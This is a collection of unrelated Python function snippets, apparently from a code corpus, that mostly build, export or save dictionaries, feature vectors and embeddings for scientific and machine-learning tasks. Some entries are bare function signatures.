"def preprocessing_fn(inputs):\n outputs = {}\n\n # This function is the entry point for your feature engineering with\n # TensorFlow Transform, using the TFX Transform component. In this example\n # the feature engineering is very simple, only applying z-score scaling.\n for key in Features.FEATURE_KEYS:\n outputs[transformed_name(key)] = tft.scale_to_z_score(inputs[key])\n\n # inputs[key]\n\n # tft.scale_to_z_score(inputs[key])\n\n # Do not apply label transformation as it will result in wrong evaluation.\n outputs[transformed_name(\n Features.LABEL_KEY)] = inputs[Features.LABEL_KEY]\n\n return outputs",
"def svm():",
"def _export_vector(self, vector_name,\n format=\"GML\",\n additional_options=[]):\n # Export the layer\n prefix = \"\"\n if format == \"GML\":\n prefix = \".gml\"\n if format == \"GeoJSON\":\n prefix = \".json\"\n if format == \"ESRI_Shapefile\":\n prefix = \"\"\n if format == \"SQLite\":\n prefix = \".sqlite\"\n if format == \"GPKG\":\n prefix = \".gpkg\"\n if format == \"CSV\":\n prefix = \".csv\"\n\n # Remove a potential mapset\n file_name = vector_name.split(\"@\")[0] + prefix\n archive_name = file_name + \".zip\"\n # switch into the temporary working directory to use relative path for zip\n os.chdir(self.temp_file_path)\n\n module_name = \"v.out.ogr\"\n args = [\"-e\", \"input=%s\"%vector_name, \"format=%s\"%format,\n \"output=%s\"%file_name]\n\n if additional_options:\n args.extend(additional_options)\n\n # Export\n p = Process(exec_type=\"grass\",\n executable=module_name,\n executable_params=args,\n stdin_source=None)\n\n self._update_num_of_steps(1)\n self._run_module(p)\n\n # Compression\n compressed_output_path = os.path.join(self.temp_file_path, archive_name)\n\n executable = \"/usr/bin/zip\"\n args = [\"-r\", archive_name, file_name]\n\n p = Process(exec_type=\"exec\",\n executable=executable,\n executable_params=args,\n stdin_source=None)\n\n self._update_num_of_steps(1)\n self._run_process(p)\n\n return archive_name, compressed_output_path",
"def npdict(self):\n\n d = {}\n\n # per profile\n d['cruise'] = self.cruise()\n d['day'] = self.day()\n d['latitude'] = self.latitude()\n d['latitude_unc'] = self.latitude_unc()\n d['longitude'] = self.longitude()\n d['longitude_unc'] = self.longitude_unc()\n d['month'] = self.month()\n d['n_levels'] = self.n_levels()\n d['primary_header_keys'] = self.primary_header_keys()\n d['probe_type'] = self.probe_type()\n d['time'] = self.time()\n d['uid'] = self.uid()\n d['year'] = self.year()\n d['PIs'] = self.PIs()\n d['originator_station'] = self.originator_station()\n d['originator_cruise'] = self.originator_cruise()\n d['originator_flag_type'] = self.originator_flag_type()\n d['t_metadata'] = self.t_metadata()\n d['s_metadata'] = self.s_metadata()\n # per level\n d['s'] = self.s()\n d['s_unc'] = self.s_unc()\n d['s_level_qc'] = self.s_level_qc()\n d['s_profile_qc'] = self.s_profile_qc()\n d['s_qc_mask'] = self.s_qc_mask()\n d['t'] = self.t()\n d['t_unc'] = self.t_unc()\n d['t_level_qc'] = self.t_level_qc()\n d['t_profile_qc'] = self.t_profile_qc()\n d['t_qc_mask'] = self.t_qc_mask()\n d['z'] = self.z()\n d['z_unc'] = self.z_unc()\n d['z_level_qc'] = self.z_level_qc()\n d['oxygen'] = self.oxygen()\n d['phosphate'] = self.phosphate()\n d['silicate'] = self.silicate()\n d['pH'] = self.pH()\n d['p'] = self.p()\n\n return d",
"def get_label_vectors():\n print(\"Retrieving label vectors...\")\n label_dict = {} # instantiate dict for labels:vectors\n categories = sorted([c for c in os.listdir('images/') if c[0] != '.']) # ignore hidden files\n x = np.zeros(len(categories)) # zero vector of number of categories\n for i, c in enumerate(categories): # get index and category for images\n y = x.copy() # use copy of x\n y[i] = 1 # set label index to true\n label_dict[c] = y.copy() # create label:vector\n\n return label_dict",
"def _dump_interest_vector(self, user_id: int,\n vector_name: str,\n vector: Dict[int, int]) -> None:\n\n key = self._key_format.format(id=user_id, name=vector_name)\n self._redis.hmset(key, vector)",
"def make_vectors_output(coord_dict, add_vectors, num_coords, color, ids, display_name='trace', state='on'):\n # default parameters\n which_set = 0\n tip_fraction = 0.5\n arrow_colors = {'line_color': color, 'head_color': color}\n \n # header for section in kin file\n result = []\n result.append('@vectorlist {%s} dimension=%s %s' % (display_name, num_coords, state))\n \n # selecting the edges to draw in this batch\n edges = []\n for k, v in add_vectors['vectors'].iteritems():\n edges = edges + [(v[i][1],v[i+1][1]) for i in range(len(v[:-1])) if v[i][1] in ids]\n \n # creating \"vectors\"\n for edge in edges:\n id_fr, id_to = edge\n # extract the coords of each vertex\n pt_fr = coord_dict[id_fr][:num_coords]\n pt_to = coord_dict[id_to][:num_coords]\n\n # different tip color for each destination coords file\n #tip_color = kinemage_colors[which_set % len(kinemage_colors)]\n # plot a color 'tip' on the line (certain % of line length)\n # this gets the coords of the beginning of the 'tip'\n diffs = (pt_to-pt_fr) * (1-tip_fraction)\n middles = pt_fr + diffs\n # add a default-color line segment\n \n # modified to use user defined\n tip_color = arrow_colors['head_color']\n label_color = arrow_colors['line_color']\n \n result.append('%s %s' % \\\n (' '.join(map(str, pt_fr)),label_color))\n result.append('%s %s P' % \\\n (' '.join(map(str, middles)),label_color))\n # add the tip-colored line segment\n result.append('%s %s' % \\\n (' '.join(map(str, middles)), tip_color))\n result.append('%s %s P' % \\\n (' '.join(map(str, pt_to)), tip_color)) \n return result",
"def export_scalars_to_json(self, path):\n with open(path, \"w\") as f:\n json.dump(self.scalar_dict, f)\n self.scalar_dict = {}",
"def export_model(self):\n\n model_pkg = dict()\n\n for k, v in self.__dict__.items():\n if k not in ['datas'] and not k.startswith('_'):\n model_pkg[k] = v\n\n for i in range(len(self.datas)):\n for k, v in self.datas[i].__dict__.items():\n model_pkg['datas_%d_%s' % (i, k)] = v\n\n return model_pkg",
"def compile_metadata(inventory_dict):\n inventory_meta = {}\n #inventory_meta['InventoryDictionary'] = inventory_dict\n for source, year in inventory_dict.items():\n inventory_meta[source] = stewi.getMetadata(source, year)\n return inventory_meta",
"def addInvariants(invar1, invar2):\n invar_sum= {}\n for key in invar1.keys():\n invar_sum[key] = np.array(np.add(invar1[key], invar2[key]))\n \n return(invar_sum)",
"def clinvar_export(store, institute_id, case_name, variant_id):\n\n institute_obj, case_obj = institute_and_case(store, institute_id, case_name)\n pinned = [store.variant(variant_id) or variant_id for variant_id in\n case_obj.get('suspects', [])]\n variant_obj = store.variant(variant_id)\n return dict(\n today = str(date.today()),\n institute=institute_obj,\n case=case_obj,\n variant=variant_obj,\n pinned_vars=pinned\n )",
"def produce_outputs(self):\n # if self.loaded_aggregated:\n # debug(\"Skippping {} mapping due to preloading\".format(self.base_name))\n # return\n # need to calc term numeric index for aggregation\n\n\n # if self.loaded_preprocessed:\n # debug(\"Skippping {} mapping due to preloading\".format(self.base_name))\n # return\n\n bagger = Bag(vocabulary=self.term_list, weighting=self.base_name, ngram_range=self.ngram_range)\n\n self.embeddings = np.ndarray((0, len(self.term_list)), dtype=np.int32)\n for idx in self.indices.get_train_test():\n texts = Text.get_strings(self.text.data.get_slice(idx))\n vecs = bagger.map_collection(texts, fit=False, transform=True)\n self.embeddings = np.append(self.embeddings, vecs, axis=0)\n del texts\n\n # texts = Text.get_strings(self.text.data.get_slice(test_idx))\n # vec_test = bagger.map_collection(texts, fit=do_fit)\n # del texts\n\n # self.embeddings = np.vstack((vec_train, vec_test))\n\n # self.embeddings = np.append(vec_train, vec_test)\n # self.vector_indices = (np.arange(len(train)), np.arange(len(test)))\n\n # set misc required variables\n self.set_constant_elements_per_instance()",
"def getCrowDistDict(self):\n retDict = Distribution.getCrowDistDict(self)\n retDict['lambda'] = self.lambdaVar\n retDict['k'] = self.k\n retDict['low'] = self.low\n return retDict",
"def MakeDictMatrix(D, header, lev=72):\n Ms = np.zeros((1, lev, len(header)))\n Mp = np.ones((1, lev, len(header)))\n for var in D.dict.keys():\n i = header.index(var)\n Ms[0, :, i] = D[var].sub_vec(lev)\n Mp[0, :, i] = D[var].prod_vec(lev)\n return(Ms,Mp)",
"def compute_kappa_map(lens_vec, size, size_map):\n\n par_file_name = \"kappa_map.par\"\n fit_file_name = \"kappa_map.fits\"\n z_source = 2.0\n size_map = size_map * 1.05\n\n file_map = open(par_file_name, 'w')\n\n conv_lens_vec(lens_vec)\n\n file_map.write(\"runmode\\n\" )\n file_map.write(\" reference 3 0 0\\n\")\n file_map.write(\" verbose 0\\n\" )\n file_map.write(\" mass 3 \" + str(size) + \" \" + \\\n str(lens_vec[0][\"z_lens\"]) + \" \" + fit_file_name + \"\\n\")\n file_map.write(\" end\\n\")\n file_map.write(\"source\\n\")\n file_map.write(\" z_source \" + str(z_source) + \"\\n\")\n file_map.write(\" end\\n\")\n file_map.write(\"grille\\n\")\n file_map.write(\" nombre 128\\n\")\n file_map.write(\" nlens 4\\n\")\n file_map.write(\" nlens_crit 1\\n\")\n file_map.write(\" nlens_opt 0\\n\")\n file_map.write(\" polaire 1\\n\")\n file_map.write(\" end\\n\")\n\n\n for i in range(len(lens_vec)):\n string_out = 'potential ' + str(i) + '\\n'\n file_map.write(string_out)\n #print string_out,\n for keys in lens_vec[i].keys():\n string_out = ' ' + keys + ' ' + str(lens_vec[i][keys]) + \\\n '\\n'\n #print string_out,\n file_map.write(string_out)\n file_map.write(' end\\n')\n\n file_map.write(\"cosmology\\n\")\n file_map.write(\" H0 70.0\\n\")\n file_map.write(\" omega 0.3\\n\")\n file_map.write(\" lambda 0.7\\n\")\n file_map.write(\" end\\n\")\n file_map.write(\"champ\\n\")\n file_map.write(\" xmin -101\\n\")\n file_map.write(\" xmax 100\\n\")\n file_map.write(\" ymin -101\\n\")\n file_map.write(\" ymax 100\\n\")\n file_map.write(\" dmax \" + str(size_map) + \"\\n\")\n file_map.write(\" end\\n\")\n file_map.write(\"fini\\n\")\n\n file_map.close()",
"def make_sol_dict():\n file_names = [\"FORMAT3_Copy of KommuneMTPLforTriangle.xls\",\n \"C Triangulations analysis R2017 GC20161109.xls\",\n \"EVOLUTION 2017 _ M+F - Triangles cat nat brut net.xls\",\n \"Bsp8 _ Dreiecke aus GCNA für CU1.4.1.xls\",\n \"Analysis MTPL MOD.xls\",\n \"Bsp6 _ Dreiecke aus GCNA für CU1.4.1.xls\",\n \"FORMAT6_sinistres.xls\",\n \"FORMAT1_LOSSES-MTPL-OVER-500-GROUP-2005_modified.xls\"]\n solutions_dict = dict()\n raw_dict = dict()\n for file_name in file_names:\n sr_list, file_name = ExcelLoader.load_excel(pdir.RESOURCES_DIR + \"/raw_test_files/\" + file_name)\n dh = DataHolder()\n for sr in sr_list:\n dh.add_sheet(sr.sheet_name, pd.DataFrame(columns=sr.headers, data=sr.row_vals),\n pd.DataFrame(columns=sr.headers, data=sr.xls_types), orig_sheet_name=sr.sheet_name)\n\n dh = SheetPreProcessor.separate_components(dh)\n raw_dict[file_name] = dh.encode()\n dh = HorizontalMerger.horizontal_merge(dh)\n #temp_path = pdir.RESOURCES_DIR + \"/temp/\"\n #dh.write_excel(temp_path + file_name)\n solutions_dict[file_name] = dh\n solutions_dict = MergePararametersOptimizer.make_ind_col_dict(solutions_dict)\n with open(pdir.RESOURCES_DIR + \"/test/merge_solutions.obj\", \"wb\") as temp_file:\n pickle.dump(solutions_dict, temp_file)\n with open(pdir.RESOURCES_DIR + \"/test/raw_test.obj\", \"wb\") as temp_file:\n pickle.dump(raw_dict, temp_file)",
"def run(self, inputIn):\n measureList = self.inputToInternal(inputIn)\n outputDict = {}\n assert(len(self.features) == len(measureList))\n for metricInstance in self.metricsDict.values():\n metricEngine = MetricDistributor.factory.returnInstance('MetricDistributor', metricInstance)\n for cnt in range(len(self.targets)):\n nodeName = (str(self.targets[cnt]) + '_' + str(self.features[cnt])).replace(\"|\",\"_\")\n varName = metricInstance.name + '|' + nodeName\n output = metricEngine.evaluate(measureList[cnt], weights=self.weight, multiOutput=self.multiOutput)\n outputDict[varName] = np.atleast_1d(output)\n return outputDict",
"def generate_query_vector(q, q_dict, inv_index):\n # Create the query vector\n query_vector = dict(Counter(q_dict[q]))\n\n # Add to this query vector, all the indexed terms\n for i_term in inv_index:\n if i_term not in query_vector:\n query_vector[i_term] = 0\n\n return query_vector",
"def to_dict(self):\n result_dict = {}\n result_dict['evaluations'] = self.evaluations\n result_dict['dof'] = self.dof\n result_dict['variances'] = self.variances\n result_dict['noise_ceiling'] = self.noise_ceiling\n result_dict['method'] = self.method\n result_dict['cv_method'] = self.cv_method\n result_dict['models'] = {}\n for i_model in range(len(self.models)):\n key = 'model_%d' % i_model\n result_dict['models'][key] = self.models[i_model].to_dict()\n return result_dict",
"def gen_values(self):",
"def export_embeddings(self):\n save_path = self.config.path_embeddings / self.model.model_name\n save_path.mkdir(parents=True, exist_ok=True)\n \n idx2ent = self.model.config.knowledge_graph.read_cache_data('idx2entity')\n idx2rel = self.model.config.knowledge_graph.read_cache_data('idx2relation')\n\n\n series_ent = pd.Series(idx2ent)\n series_rel = pd.Series(idx2rel)\n series_ent.to_pickle(save_path / \"ent_labels.pickle\")\n series_rel.to_pickle(save_path / \"rel_labels.pickle\")\n\n with open(str(save_path / \"ent_labels.tsv\"), 'w') as l_export_file:\n for label in idx2ent.values():\n l_export_file.write(label + \"\\n\")\n\n with open(str(save_path / \"rel_labels.tsv\"), 'w') as l_export_file:\n for label in idx2rel.values():\n l_export_file.write(label + \"\\n\")\n\n for parameter in self.model.parameter_list:\n all_ids = list(range(0, int(parameter.shape[0])))\n stored_name = parameter.name.split(':')[0]\n # import pdb; pdb.set_trace()\n\n if len(parameter.shape) == 2:\n all_embs = parameter.numpy()\n with open(str(save_path / (\"%s.tsv\" % stored_name)), 'w') as v_export_file:\n for idx in all_ids:\n v_export_file.write(\"\\t\".join([str(x) for x in all_embs[idx]]) + \"\\n\")\n\n df = pd.DataFrame(all_embs)\n df.to_pickle(save_path / (\"%s.pickle\" % stored_name))",
"def write_kotlin_source(self):\n prefix = \"import \"\n imports = [prefix + \"koma.matrix.Matrix\", prefix + \"koma.extensions.set\"]\n\n with open(self.class_name + \"Coeffs.kt\", \"w\") as source_file:\n for val in sorted(imports):\n print(val, file=source_file)\n\n source_file.write(os.linesep)\n ty = \"Matrix<Double>\"\n\n # data classes needed because java state space isn't in wpilib (yet)\n self.__write_kotlin_data_class(source_file, \"StateSpacePlantCoeffs\", {\"A\": ty, \"B\": ty, \"C\": ty, \"D\": ty})\n self.__write_kotlin_data_class(source_file, \"StateSpaceControllerCoeffs\",\n {\"K\": ty, \"Kff\": ty, \"Umin\": ty, \"Umax\": ty})\n if self.period_variant:\n self.__write_kotlin_data_class(source_file, \"StateSpaceObserverCoeffs\", {\"Qcontinuous\": ty, \"Rcontinuous\": ty, \"PsteadyState\": ty})\n else:\n self.__write_kotlin_data_class(source_file, \"StateSpaceObserverCoeffs\", {\"K\": ty})\n source_file.write(os.linesep)\n\n # write makePlantCoeffs()\n self.__write_kotlin_func_name(source_file, \"StateSpacePlantCoeffs\", \"PlantCoeffs\")\n if self.period_variant:\n self.__write_kotlin_matrix(source_file, self.system.sysc.A, \"Acontinuous\")\n self.__write_kotlin_matrix(source_file, self.system.sysc.B, \"Bcontinuous\")\n self.__write_kotlin_matrix(source_file, self.system.sysd.C, \"C\")\n self.__write_kotlin_matrix(source_file, self.system.sysd.D, \"D\")\n print(\n \" return StateSpacePlantCoeffs(Acontinuous, Bcontinuous, C, D)\",\n file=source_file)\n else:\n self.__write_kotlin_matrix(source_file, self.system.sysd.A, \"A\")\n self.__write_kotlin_matrix(source_file, self.system.sysd.B, \"B\")\n self.__write_kotlin_matrix(source_file, self.system.sysd.C, \"C\")\n self.__write_kotlin_matrix(source_file, self.system.sysd.D, \"D\")\n print(\n \" return StateSpacePlantCoeffs(A, B, C, D)\",\n file=source_file\n )\n print(\"}\" + os.linesep, file=source_file)\n\n # Write makeControllerCoeffs()\n self.__write_kotlin_func_name(source_file, \"StateSpaceControllerCoeffs\", \"ControllerCoeffs\")\n self.__write_kotlin_matrix(source_file, self.system.K, \"K\")\n self.__write_kotlin_matrix(source_file, self.system.Kff, \"Kff\")\n self.__write_kotlin_matrix(source_file, self.system.u_min, \"Umin\")\n self.__write_kotlin_matrix(source_file, self.system.u_max, \"Umax\")\n print(\n \" return StateSpaceControllerCoeffs(K, Kff, Umin, Umax)\",\n file=source_file\n )\n print(\"}\" + os.linesep, file=source_file)\n\n # Write makeObserverCoeffs()\n self.__write_kotlin_func_name(source_file, \"StateSpaceObserverCoeffs\", \"ObserverCoeffs\")\n if self.period_variant:\n self.__write_kotlin_matrix(source_file, self.system.Q, \"Qcontinuous\")\n self.__write_kotlin_matrix(source_file, self.system.R, \"Rcontinuous\")\n self.__write_kotlin_matrix(source_file, self.system.P_steady, \"PsteadyState\")\n\n first_line_prefix = \" return StateSpaceObserverCoeffs(\"\n space_prefix = \" \" * len(first_line_prefix)\n print(first_line_prefix + \"Qcontinuous, Rcontinuous,\", file=source_file)\n print(space_prefix + \"PsteadyState)\", file=source_file)\n else:\n self.__write_kotlin_matrix(source_file, self.system.kalman_gain, \"K\")\n print(\" return StateSpaceObserverCoeffs(K)\", file=source_file)\n print(\"}\" + os.linesep, file=source_file)",
"def save_expval_final_statevecs():\n # Get pre-measurement statevectors\n statevecs = []\n # State |+1>\n statevec = Statevector.from_label(\"+1\")\n statevecs.append(statevec)\n # State |00> + |11>\n statevec = (Statevector.from_label(\"00\") + Statevector.from_label(\"11\")) / np.sqrt(2)\n statevecs.append(statevec)\n # State |10> -i|01>\n statevec = (Statevector.from_label(\"10\") - 1j * Statevector.from_label(\"01\")) / np.sqrt(2)\n statevecs.append(statevec)\n return statevecs",
"def word2vec_mapping_func():\n return {\"belonging to\": \"belonging\", \"parked on\": \"parked\", \"growing on\": \"growing\", \"standing on\": \"standing\",\n \"made of\": \"made\", \"attached to\": \"attached\", \"hanging from\": \"hanging\", \"in front of\": \"front\",\n \"lying on\": \"lying\", \"flying in\": \"flying\", \"looking at\": \"looking\", \"on back of\": \"back\",\n \"laying on\": \"laying\", \"walking on\": \"walking\", \"walking in\": \"walking\", \"sitting on\": \"sitting\",\n \"covered in\": \"covered\", \"part of\": \"part\", \"painted on\": \"painted\", \"mounted on\": \"mounted\"}",
"def create_vectors(self):\n self.localStatistics = []\n self.lastStatistics = []\n self.globalV = []\n self.estimate = []\n self.delta = []\n self.drift = []\n self.slack = [] # only for coordBased model",
"def vectorize(data, word_dict):\n\n # Index words\n inputs_list = data['input']\n targets_list = data['target']\n\n inputs = []\n for k in range(len(inputs_list)):\n year,month,day = inputs_list[k][0].split('/')\n year, month, day = int(year),int(month),int(day)\n if k == 0:\n week_index = datetime.timedelta(days=0)\n time0 = datetime.date(year,month,day)\n else:\n time1 = datetime.date(year,month,day)\n week_index = time1-time0\n tp_list = [word_dict[w] for w in inputs_list[k][1]]\n inputs.append([week_index.days,tp_list])\n\n year, month, day = targets_list[0].split('/')\n year, month, day = int(year), int(month), int(day)\n time1 = datetime.date(year, month, day)\n week_index = time1 - time0\n targets = [week_index.days,word_dict[targets_list[1]]]\n return {'input':inputs,'target':targets,'<PAD>':word_dict['<PAD>']}",
"def create_vector_datapackage(pk_type, path, file_flag, out_path):\n process_source(pk_type, path, file_flag, out_path)",
"def save_results(self, *args):\n try:\n filename = args[0]\n except IndexError:\n filename = self.filename\n results = {}\n results['gp_pred'] = self.gp_predictions\n results['func_val'] = self.target_func_vals\n results['inds_all'] = np.array(self.indices_all)\n results['vals_all'] = np.array(self.vals_all)\n np.save(filename+\".npy\", results)",
"def __post_init__(self):\n all_vecs = {}\n for n2 in self._get_n2():\n all_vecs[n2] = all_vecs.get(n2, 0) + 1\n\n object.__setattr__(self, \"_n2\", np.array(list(all_vecs.keys())).reshape(-1, 1))\n object.__setattr__(\n self, \"_multiplicity\", np.array(list(all_vecs.values())).reshape(-1, 1)\n )\n object.__setattr__(\n self,\n \"_normalization\",\n 2 * np.pi * np.log(self.N)\n if self.spherical\n else 2 * np.pi * np.log(self.N) - 4 * (CATALAN - np.pi / 2 * np.log(2)),\n )",
"def add_vector_fields(attributes, data):\n for attrib in attributes:\n if attrib['similarity'] == 'Semantic USE':\n value = data.get(attrib['name'])\n if value is not None:\n newVal = {}\n newVal['name'] = value\n newVal['rep'] = getVector(value)\n data[attrib['name']] = newVal\n elif attrib['similarity'] == 'Semantic SBERT':\n value = data.get(attrib['name'])\n if value is not None:\n newVal = {}\n newVal['name'] = value\n newVal['rep'] = getVectorSemanticSBERT(value)\n data[attrib['name']] = newVal\n elif attrib['similarity'] == 'Array SBERT':\n value = data.get(attrib['name'])\n if value is not None:\n newVal = {}\n newVal['name'] = value\n newVal[\"rep\"] = []\n array = getVectorSemanticSBERTArray(value)\n for element in array:\n temp = {}\n temp['rep'] = element\n newVal[\"rep\"].append(temp)\n\n data[attrib['name']] = newVal\n return data",
"def classify(self, vector):\n return {}",
"def vector_columns(map, layer=None, getDict=True, **args):\n s = read_command('v.info', flags='c', map=map, layer=layer, quiet=True,\n **args)\n if getDict:\n result = dict()\n else:\n result = list()\n i = 0\n for line in s.splitlines():\n ctype, cname = line.split('|')\n if getDict:\n result[cname] = {'type': ctype, 'index': i}\n else:\n result.append(cname)\n i += 1\n\n return result",
"def vectorize(self,clean_path):\n \n #load pretrained embedding model (GloVe)\n glove = spacy.load('en_core_web_lg')\n #extract unique words (aka vocabulary)\n unique_words = set()\n for d in self.docs: \n txt = d.text\n doc = glove(txt)\n for word in doc: \n if word.has_vector:\n unique_words.add(word.text)\n #change set to list type\n unique_words = list(unique_words)\n #save vector representation\n word_vectors = np.array([glove(word).vector for word in unique_words if glove(word).has_vector])\n #index vectors by corresponding word \n corpus_vectors = pd.DataFrame(word_vectors, index=unique_words)\n with open(clean_path + 'corpus_vectors.pkl', 'wb') as f:\n pickle.dump(corpus_vectors,f)\n self.vectors = corpus_vectors\n print('Saved embedding vectors.')\n return",
"def generate_rel_non_rel_vector(inv_index, doc_scores, start, end):\n\n result_vector = {}\n\n for i in range(start, end):\n doc_id, doc_score = doc_scores[i]\n\n # Get the content of this document which will be in the form of a string\n # convert it into a list of words and create a frequency map of the\n # words\n\n # NOTE: corpus_collection_path is the global variable here\n\n fp = open(str(corpus_collection_path) + \"\\\\\" + doc_id + \".html\")\n content = fp.read().split()\n fp.close()\n\n result_vector = dict(Counter(content))\n\n # Check with the inverted index\n for index_item in inv_index:\n if index_item not in result_vector:\n result_vector[index_item] = 0\n\n return result_vector",
"def write_vector(vector, outfile):\r\n out_dir = os.path.dirname(outfile)\r\n if not os.path.exists(out_dir):\r\n os.makedirs(out_dir)\r\n\r\n vector = vector.copy()\r\n for k in vector:\r\n if isinstance(vector[k], np.ndarray):\r\n vector[k] = vector[k].round(4).tolist()\r\n with open(outfile, 'w') as f:\r\n json.dump(vector, f)\r\n f.write('\\n')\r\n\r\n print(\" ... wrote {}\".format(outfile))",
"def dictionary_saver(d, filename):\n json_friendly_d = {json.dumps(k):v for k,v in d.items()}\n sklearn.externals.joblib.dump(json_friendly_d, filename)",
"def getCrowDistDict(self):\n retDict = Distribution.getCrowDistDict(self)\n retDict['k'] = self.alpha\n retDict['theta'] = 1.0/self.beta\n retDict['low'] = self.low\n return retDict",
"def __call__(self, *args, **kwargs):\n self.features = dict((k, v()) for k, v in self.features.items())\n return self.features",
"def write_vector(vector, outfile):\n out_dir = os.path.dirname(outfile)\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n vector = vector.copy()\n for k in vector:\n if isinstance(vector[k], np.ndarray):\n vector[k] = vector[k].round(4).tolist()\n with open(outfile, 'w') as f:\n json.dump(vector, f, separators=(',', ': '), indent=4)\n f.write('\\n')\n\n print(\" ... wrote {}\".format(outfile))",
"def create_datastructures_for_target_mtz(experiments, mtz_file):\n m = mtz.object(mtz_file)\n ind = m.extract_miller_indices()\n cols = m.columns()\n col_dict = {c.label(): c for c in cols}\n r_t = flex.reflection_table()\n if \"I\" in col_dict: # nice and simple\n r_t[\"miller_index\"] = ind\n r_t[\"intensity\"] = col_dict[\"I\"].extract_values().as_double()\n r_t[\"variance\"] = flex.pow2(col_dict[\"SIGI\"].extract_values().as_double())\n elif \"IMEAN\" in col_dict: # nice and simple\n r_t[\"miller_index\"] = ind\n r_t[\"intensity\"] = col_dict[\"IMEAN\"].extract_values().as_double()\n r_t[\"variance\"] = flex.pow2(col_dict[\"SIGIMEAN\"].extract_values().as_double())\n elif \"I(+)\" in col_dict: # need to combine I+ and I- together into target Ih\n if col_dict[\"I(+)\"].n_valid_values() == 0: # use I(-)\n r_t[\"miller_index\"] = ind\n r_t[\"intensity\"] = col_dict[\"I(-)\"].extract_values().as_double()\n r_t[\"variance\"] = flex.pow2(\n col_dict[\"SIGI(-)\"].extract_values().as_double()\n )\n elif col_dict[\"I(-)\"].n_valid_values() == 0: # use I(+)\n r_t[\"miller_index\"] = ind\n r_t[\"intensity\"] = col_dict[\"I(+)\"].extract_values().as_double()\n r_t[\"variance\"] = flex.pow2(\n col_dict[\"SIGI(+)\"].extract_values().as_double()\n )\n else: # Combine both - add together then use Ih table to calculate I and sigma\n r_tplus = flex.reflection_table()\n r_tminus = flex.reflection_table()\n r_tplus[\"miller_index\"] = ind\n r_tplus[\"intensity\"] = col_dict[\"I(+)\"].extract_values().as_double()\n r_tplus[\"variance\"] = flex.pow2(\n col_dict[\"SIGI(+)\"].extract_values().as_double()\n )\n r_tminus[\"miller_index\"] = ind\n r_tminus[\"intensity\"] = col_dict[\"I(-)\"].extract_values().as_double()\n r_tminus[\"variance\"] = flex.pow2(\n col_dict[\"SIGI(-)\"].extract_values().as_double()\n )\n r_tplus.extend(r_tminus)\n r_tplus.set_flags(\n flex.bool(r_tplus.size(), False), r_tplus.flags.bad_for_scaling\n )\n r_tplus = r_tplus.select(r_tplus[\"variance\"] != 0.0)\n Ih_table = create_Ih_table(\n [experiments[0]], [r_tplus], anomalous=True\n ).blocked_data_list[0]\n r_t[\"intensity\"] = Ih_table.Ih_values\n inv_var = Ih_table.sum_in_groups(Ih_table.weights, output=\"per_refl\")\n r_t[\"variance\"] = 1.0 / inv_var\n r_t[\"miller_index\"] = Ih_table.miller_index\n else:\n raise KeyError(\"Unable to find intensities (tried I, IMEAN, I(+)/I(-))\")\n logger.info(f\"Extracted {r_t.size()} intensities from target mtz\")\n r_t = r_t.select(r_t[\"variance\"] > 0.0)\n if r_t.size() == 0:\n raise ValueError(\"No reflections with positive sigma remain after filtering\")\n r_t[\"d\"] = (\n miller.set(\n crystal_symmetry=crystal.symmetry(\n space_group=m.space_group(), unit_cell=m.crystals()[0].unit_cell()\n ),\n indices=r_t[\"miller_index\"],\n )\n .d_spacings()\n .data()\n )\n r_t.set_flags(flex.bool(r_t.size(), True), r_t.flags.integrated)\n\n exp = Experiment()\n exp.crystal = deepcopy(experiments[0].crystal)\n exp.identifier = ersatz_uuid4()\n r_t.experiment_identifiers()[len(experiments)] = exp.identifier\n r_t[\"id\"] = flex.int(r_t.size(), len(experiments))\n\n # create a new KB scaling model for the target and set as scaled to fix scale\n # for targeted scaling.\n params = Mock()\n params.KB.decay_correction.return_value = False\n exp.scaling_model = KBScalingModel.from_data(params, [], [])\n exp.scaling_model.set_scaling_model_as_scaled() # Set as scaled to fix scale.\n return exp, r_t",
"def getDataDict(self):\n # Used to compare data in MATLAB\n d = {'Vm': self.r_Vm,\n 'Va': self.r_Va,\n 'BusName': self.Busnam,\n 'BusNum': self.Extnum,\n }\n return d",
"def getSolutionExportVariableNames(cls):\n return {}",
"def transformDistDict(self):\n # Generate a standard normal distribution, this is used to generate the sparse grid points and weights for multivariate normal\n # distribution if PCA is used.\n standardNormal = Distributions.Normal()\n standardNormal.mean = 0.0\n standardNormal.sigma = 1.0\n standardNormal.initializeDistribution()\n distDicts = {}\n for varName in self.variables2distributionsMapping:\n distDicts[varName] = self.distDict[varName]\n if self.variablesTransformationDict:\n for key, varsDict in self.variablesTransformationDict.items():\n if self.transformationMethod[key] == 'pca':\n listVars = varsDict['latentVariables']\n for var in listVars:\n distDicts[var] = standardNormal\n\n return distDicts",
"def exportData(self):\n\t\tlays = rlayer.renderlayers()\n\t\tdata = {}\n\t\tfor l in lays:\n\t\t\tif l.name == 'defaultRenderLayer':\n\t\t\t\tcontinue\n\t\t\tdata[l.name] = {'objects':l.objects, # OBJECTS IN LAYER\n\t\t\t\t\t\t\t'values' :l.overridesWithValues, # OVERRIDED ATTRIBUTES ONLY CHANGED VALUES\n\t\t\t\t\t\t\t'conns' :l.overridesWithConnections[0], # OVERRIDED ATTRIBUTES CHANGED CONNECTIONS\n\t\t\t\t\t\t\t'shader' :l.overridedShader # OVERRIDE RENDERLAYER SHADER\n\t\t\t\t\t\t\t}\n\t\tpickle.dump( data, open( self.dataPath.path, \"wb\" ) )",
"def _results(self):\n results = {}\n results[\"coeff\"] = self._coeff_to_dict()\n results[\"coeff_path\"] = dict(\n zip(\n [f\"{col}\" for col in self.X_train_.columns.tolist()],\n (\n self.model_.coef_path_.reshape(-1, self.model_.coef_path_.shape[-1])\n ).tolist(),\n )\n )\n results[\"cv_standard_error\"] = self.model_.cv_standard_error_.tolist()\n results[\"cv_mean_score\"] = self.model_.cv_mean_score_.tolist()\n results[\"lambda_path\"] = self.model_.lambda_path_.tolist()\n results[\"lambda_best\"] = self.model_.lambda_best_[0]\n results[\"lambda_max\"] = self.model_.lambda_max_\n results[\"n_lambda\"] = self.model_.n_lambda_\n results[\"intercept\"] = self.model_.intercept_\n results[\"intercept_path\"] = self.model_.intercept_path_.tolist()[0]\n results[\"params\"] = self.model_.get_params()\n results[\"module\"] = self.model_.__module__\n\n return results",
"def dump_w2vdictionary(outfilename,wordlist,matrix):\n ostream = open(outfilename,'w')\n print('%d %d'%(len(wordlist),matrix.shape[1]),file=ostream)\n for word,vec in zip(wordlist,matrix):\n print(' '.join([word]+ [ str(elt) for elt in vec]),file=ostream)\n ostream.close()",
